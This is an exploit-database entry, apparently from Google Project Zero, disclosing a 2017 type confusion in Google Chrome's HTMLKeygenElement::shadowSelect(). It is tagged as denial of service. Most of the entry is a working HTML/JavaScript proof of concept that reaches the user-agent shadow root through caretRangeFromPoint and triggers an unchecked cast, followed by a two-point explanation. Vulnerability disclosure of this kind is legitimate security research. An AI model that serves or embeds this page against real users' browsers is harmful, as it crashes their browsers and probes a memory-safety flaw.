Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion

Author: Google Security Research
type: dos
platform: multiple
port: 
date_added: 2017-02-01 
date_updated: 2017-02-01 
verified: 1 
codes:  
tags: Denial of Service (DoS)
aliases:  
screenshot_url:  
application_url: 

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=994

Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=666246

PoC:
-->

<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>

<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->